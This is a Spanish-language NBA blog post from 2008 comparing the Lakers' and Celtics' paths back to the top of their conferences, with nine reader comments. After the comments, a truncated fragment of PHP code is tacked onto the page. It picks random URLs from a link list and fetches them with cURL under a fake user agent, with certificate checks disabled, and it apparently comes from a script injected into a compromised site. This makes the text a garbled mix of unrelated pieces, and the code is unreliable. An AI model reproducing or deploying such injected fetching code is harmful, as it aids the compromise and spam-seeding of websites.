Los caminos del éxito

16 de April de 2008 por MagicJohnson32

larrymagicfreeAdivinen qué equipos encabezaron las Conferencias Este y Oeste al término de la temporada 1987-1988. Sí, fueron esos dos equipos. Hacía 20 años, desde aquella 87-88, que Celtics y Lakers no miraban al resto de franquicias desde lo alto de sus respectivas conferencias. ¿Más coincidencias con esta temporada 07-08? En aquella ocasión, Boston cerró la regular season con un balance de 57-25, exactamente el mismo que presentan este año los Lakers tras imponerse anoche con comodidad a los Kings y asegurarse, de esta manera, el liderato del Oeste más competitivo que recordamos.

Así que la NBA vuelve a medirse, en buena parte, en términos de una rivalidad que ha engrandecido tanto a las dos franquicias implicadas como a la propia liga, al baloncesto y al deporte en general. Lakers y Celtics, Celtics y Lakers, vuelven a recordarnos que los equipos grandes no fundamentan su éxito en una aplastante superioridad deportiva concentrada en periodos de tiempo relativamente cortos, sino en su capacidad para generar ciclos que, de un modo u otro, acaban por devolverlos a la cima.

Los Celtics han tenido serios problemas en los últimos tiempos para reducir los tramos depresivos en sus ciclos. Los magníficos años de Larry Bird, McHale, Ainge, auerbachrussellParrish, etc. dieron a Boston tres títulos entre el 81 y el 86. En los 70 habían llegado 2 títulos, y antes, entre 1957 y 1969, Auerbach y Russell coleccionaron 11 anillos. En el 86, además de lograr el título, los Celtics dispusieron de la segunda elección en el draft y el futuro aparecía inmejorable para una franquicia para la que el triunfo era parte indisociable de la competición.

Pero prácticamente todo salió mal desde entonces y los Celtics no han vuelto a ganar el anillo. El jugador al que eligieron en ese Draft de 1986, Len Bias, falleció menos de 48 horas después de la ceremonia por un ataque al corazón causado por el consumo de drogas. La tragedia, vista ahora, generó un punto de inflexiónlenbiasdeath en la trayectoria de la franquicia, pese a que los Celtics alcanzaron las Finales en el 87 y la final de Conferencia en el 88. En la década de los 90 tocaron fondo con seis temporadas consecutivas fuera de los Playoffs. En el 2002, ya con Pierce y Walker, estuvieron cerca de alcanzar las Finales, cosa que habría permitido ver un nuevo Lakers vs Celtics por el título. Sin embargo, al año siguiente fueron barridos en semifinales de Conferencia y en temporadas posteriores se fueron hundiendo hasta el 24-58 que presentaron el año pasado.

Pero este verano Ainge y los Celtics recuperaron mucho del terreno perdido con la adquisición de Kevin Garnett y Ray Allen, y, tras una fabulosa fase regular, se encuentran en una situación inmejorable de cara a estos Playoffs. Boston ha vencido 65 de los 81 partidos que ha disputado hasta ahora, a falta únicamente del de esta noche ante los Nets. Eso supone un porcentaje superior al 80% de victorias, abismalmente por encima del 29% de hace 12 meses.

La temporada de los Celtics deja escaso margen para las dudas. Han sido durante todo el año el equipo con más victorias, el equipo con mejor balance tanto contra equipos de su propia conferencia como contra kgpplaughequipos del Oeste, y el equipo con el mayor diferencial entre puntos anotados y recibidos, un brutal +10,2. Los verdes encaran los Playoffs con toda la confianza aunque también con la presión y el favoritismo que les otorga la gran superioridad que han mostrado. En primera ronda no deberían de tener problemas ante los Hawks, un equipo que ha logrado 28 victorias menos que los Celtics. En semifinales de Conferencia se cruzarán con Cleveland o Washington; es decir, o LeBron James & Co. o el segundo mejor Big Three del Este. Por el otro lado, Detroit y Orlando parten como principales candidatos a la final de Conferencia, mientras Toronto y Philadelphia aspiran a dar la sorpresa.

En los Celtics, de nuevo, todo lo que no sea alcanzar las Finales se verá como un fracaso. Ha costado 20 años pero al fin las cosas han vuelto a la esplendorosa normalidad.

Los Lakers, por su parte, son un ejemplo modélico, especialmente desde que Jerry Buss se hizo cargo de la franquicia en 1979. Casualmente, aquel mismo año los angelinos seleccionaron a Magic Johnson con el número 1 del Draft y, entre ambos, uno desde el parquet y otro desde los despachos, modelaron los Lakers tal y como ahora los conocemos.

lakershowtime

Porque hay que conceder a Buss el mérito de buena parte del éxito que ha acompañado a los Lakers desde entonces. En los 25 años anteriores a la llegada de Buss, la franquicia del púrpura y dorado había obtenido un solo título, el de 1972, el del récord de 33 victorias consecutivas. Desde que Buss es el dueño de los Lakers, y de eso hace 28 años, han sido 8 los Anillos de campeones obtenidos, con 14 títulos de Conferencia y otros tantos de División.

Gerald Hatten Buss, Jerry, hombre de negocios y buen jugador de poker, nojerrybussring cree en las reconstrucciones. Su filosofía es que para llegar a lo más alto hay que mantenerse arriba. Buss construyó los Lakers del Showtime y el día en que su equipo se convirtió en el primero en ganar el título en el Boston Garden se permitió el lujo de decir: “Esto acaba con la frase más odiosa en lengua inglesa: los Lakers nunca han vencido a los Celtics”. Tras el declive de aquel equipo campeón, que dejó 5 anillos y otras 4 finales, apenas pasaron unos años cuando Buss los devolvió a la élite con la adquisición de Shaquille O’Neal como agente libre y la elección de Kobe Bryant en el draft, una elección que llegó a cambio de Vlade Divac.

En el verano del 99, Buss completó el puzzle: La llegada de Phil Jackson al banquillo y la incorporación de algunos ilustres veteranos (véase Harper, Shaw, AC Green, etc.) dieron al equipo la madurez y el carácter que le faltaba. Hubo dinastía, three-peat (marca registrada por Pat Riley) y, de nuevo, éxito en Los Angeles. Aquello, como bien es sabido, acabó de mala manera, con críticas cruzadas entre todos los protagonistas. Llegado el momento, Buss apostó claramente por Kobe Bryant en detrimento de Shaquille O’Neal, con quien se enfrentó públicamente (si entendemos por “enfrentamiento público” que el jugador le gritase durante el trascurso de un partido de pretemporada).kobecelts

Así, con Bryant como indiscutible jugador franquicia, Buss y Kupchak han ido añadiendo piezas al puzzle, de forma lenta, por momentos errática, pero final e indiscutiblemente, efectiva. Los escasos avances en la formación de un equipo con aspiraciones llevaron a Bryant a pedir públicamente el traspaso este pasado verano. Inmediatamente se dispararon los rumores de refuerzos para los Lakers, desde Jermaine O’Neal hasta Jason Kidd, Kirilenko, Artest o el mismo Kevin Garnett. Llegó Derek Fisher, viejo compañero y amigo de Kobe. El torneo Panamericano, primera participación de Bryant con la selección, ayudó a sobrellevar el verano de mejor manera, aunque unas declaraciones de Buss reconociendo que escucharía las ofertas por Bryant volvieron a encender la mecha.

Pero todos los rumores sobre su marcha, especialmente intensos en el caso de los Bulls, desaparecieron cuando se inició la regular season. Un inicio gris, con 9 victorias y 8 derrotas, dio paso a una temporadakobepaulal muy por encima de todas las previsiones. La lesión de Andrew Bynum en enero, cuando el equipo era líder de Conferencia, encendió todas las alarmas y el resultado fue el traspaso de Kwame Brown, Javaris Crittenton, los derechos de Marc Gasol y varias elecciones del draft a cambio de Pau Gasol, un movimiento que redime a Mitch Kupchak de todos los errores cometidos en el pasado.

Sin Bynum pero con Gasol los Lakers han vuelto a escalar hasta el primer puesto del Oeste, lugar que no ocupaban al término de la fase regular desde la campaña 1999-2000, la primera de Phil Jackson al frente de los Lakers.

Como en el caso de los Celtics, las aguas han vuelto a su curso. Muchos lo atribuirán a la torpeza de otros GM’s, o a la suerte, o a la mano negra de David Stern. La realidad es que la mayoría de equipos pasan mientras Lakers y Celtics siempre vuelven. Ellos conocen bien los caminos del éxito porque lo han recorrido varias veces.

Comenta

9 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    No existe nada en el mundo del baloncesto comparable a un Lakers-Céltics.
    Es EL DERBI. La competitividad más extrema (entiendo que desde nuestra posición, competitividad serena y bien entendida)
    La gran diferencia con lo que en nuestros deportes entendemos por rivalidad es que en este caso, por la estructura de la competición, no podemos disfrutar de la lucha por el título entre ambos contendientes nada más que en contadas ocasiones. De ahí surge la admiración y el respeto por el rival… porque es la máxima suerte vivir esos momentos y no se convierte en una rutina, en ocasiones malsana, como sucede en las ligas a las que estamos acostumbrados.
    Soy aficionado a la NBA desde que se empezó a televisar en España… y únicamente he podido disfrutar de 3 finales entre ellos. En casi 25 años 3 ocasiones nada más. Pequeñas dosis de lo más grande que uno ha podido ver en este u otro deporte.
    Eso debería ser suficiente para entender la relación de odio/amor que existe entre los dos equipos. El dorado contra el verde. Bird-McHale y Parris contra Magic, Kareem y Worthy. El jodido duende y el Showtime.
    La dureza de los céltics en aquel fatídico partido del 84 o el Baby Hook de Magic en los morros de McHale y Parrish, el Boston Garden, el Forum… Sencillamente los dos equipos más grandes y con más historia de la NBA frente a frente.
    Pero es que sólo hemos podido ver ese duelo 3 veces!!!

    Los Lakers se han enfrentado a otros grandísimos equipos… Bulls de Jordan y Pippen, Sixers de Moses Malone y el Dr J, los Bad Boys, los Kings, los Spurs… Pero no se puede comparar con el duelo máximo.
    La mayor gloria a la que podemos aspirar es a vencer a Boston en esa hipotética final.
    La gran batalla y el cuchillo entre los dientes.

    Además, Gasol… ¿qué más podemos pedir???

      Citar

  2. txusma dice:
    #2

    Si Magic y Bird no hubieran acabado en Lakers y Celtics, posiblemente la historia hubiera cambiado y es que creo q fueron aquellos 2 jugadores los que encumbraron realmente estos enfrentamientos. En aquello epoca, no dudo, que eran lo mas, “de lo más grande que uno ha podido ver en este u otro deporte”, pero ahora se lo tienen que volver a ganar y los jugadores tienen que volver a demostrar que un Celtics – Lakers esta por encima de cualquier otro partido.
    Son los jugadores los que escriben las historias de las franquicias.

      Citar

  3. TheDeerHunter dice:
    #3

    Por supuesto.
    Pero es la historia y las franquicias las que quedan.
    Los jugadores… alguno que otro únicamente.

    Es evidente que no sucederá igual que en aquella época. Puede que fuera (si llega a suceder) un enfrentamiento completamente distinto.
    No obstante, insisto, no se puede evitar… somos y sufrimos del equipo que nos ha robado el corazón, por la razón que sea. Tampoco se puede evitar tener más ganas a unos rivales que a otros. Cuestión de sentimientos. Eso trasciende el momento, los jugadores y todo lo que quieras añadir.

    Por otro lado, a priori y con las plantillas de ambos equipos en la mano no puedes negar que estamos ante una posible final acojonante.

      Citar

  4. txusma dice:
    #4

    Totalmente de acuerdo: Creo q seria la mejor final en mucho tiempo. (En dura pugna con San Antonio – New Jersey :D)

      Citar

  5. Viva_Dirk dice:
    #5

    Pues si, esa rivalidad es en parte gracias a Magic y Bird, pero no es menos importante en ella la batalla que mantuvieron a principios de los 60 los Lakers de West&Baylor con los Celtics de Havlicek y Russell.

    Ciertamente, ya sin Jordan en nuestras vidas, un Lakers VS Celtics es lo mas grande que se puede ver.

      Citar

  6. TheDeerHunter dice:
    #6

    Discrepo… Jordan ofreció otra cosa, extraordinaria sin duda… pero para que el espectáculo hubiera sido completo debería haber tenido un rival, un némesis Jordan con un equipo a su altura.
    Jordan 6 de 6 finales. No hubo contienda propiamente dicha.

    Magic vs Bird sí era competición de verdad. Un año uno, el siguiente otro… duelos directos. Final universitaria para Magic, Rookie del año para Bird, MVP del primer año para Magic, 5 títulos Lakers, 3 Celtics, 2 a 1 para los verdes en finales directas, ostias a mansalva, equipos perfectos… Esa competitividad fue única.
    Los celtics 16 anillos, los Lakers 14… ni se sabe cuantas veces se han enfrentado en la final. Esa competitividad es única.

    A Jordan no lo pudimos disfrutar de esa forma. Todos sabíamos que iba a ganar. No creo que sea la misma emoción.

      Citar

  7. Viva_Dirk dice:
    #7

    En parte tienes razón, pero solo en parte.

    Empiezo por el final, dices que todos sabiamos que iba a ganar y no es cierto. Algunos lo teníamos claro(incluso a corta edad, jeje), pero eran muchas las voces que decían que Jordan no iba a poder con el Showtime, porque el primer anillo de Jordan fue contra unos Lakers en los que Magic hacia 20-12, Worthy hacia su temporada mas anotadora y que habian ganado 58 partidos aquel mismo año.

    Dos años después tras las 62 victorias de Phoenix en la regular season, con el factor cancha a su favor también habia muchos que decían que eran favoritos los de Barkley, Johnson, Majerle, Ceballos y Chambers.

    Y después de la eliminatoria contra Indiana en el 98 aun recuerdo a Montes diciendo ‘Salt Lake City será su tumba’.

    Es verdad que la rivalidad no era la de Bird y Magic, pero porque ningun equipo fue lo suficientemente constante para mantenerse ahí arriba, y claro que no habia un némesis Jordan, habia escoltas buenísimos con equipos mejores que el de Mike, pero no eran Mike.

      Citar

  8. MagicJohnson32 dice:
    #8

    Independientemente de todo eso que comentáis, lo que más me fascina es que Lakers y Celtics son las únicas franquicias para las que su lugar natural es ser competitivos, ganar y ganar, y lo raro es verlas en situaciones diferentes a ésa. Lo de los Celtics en los últimos años (quiero decir, desde los 90 hasta ahora) ha sido una auténtica rareza. Al fin han vuelto. Pero es que sólo era cuestión de tiempo, igual que lo de los Lakers.

    Porque siempre vuelven. Siempre.

    Como Benedetti…

    Vuelvo / quiero creer que estoy volviendo
    con mi peor y mi mejor historia
    conozco este camino de memoria
    pero igual me sorprendo.

      Citar

  9. Elio dice:
    #9

    Lo de Lakers y Celtics es incomparable en la NBA, su trayectoria histórica los situa un peldaño por encima del resto de equipos y la rivalidad existente se ha forjado a lo largo de décadas e incontables finales entre ellos. Ojalá este año se pueda repetir y ganen los Lakers 4-2 😀

    Hubiera estado bien que los Bulls hubieran encontrado un rival así, tal vez Utah si se hubiese puesto las pilas antes pero los Jazz son un equipo sin mercado y sin fans más allá de Salt Lake City, tampoco les hubiera servido. O puede que hubieran sido los mismísimos Celtics si Len Bias no hubiese sido un gilipollas, tal vez estábamos ante uno de los mas grandes jugadores de la historia que se quedó en nada por culpa de la cocaína.

    Buen post y buenos comentarios, enhorabuena.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>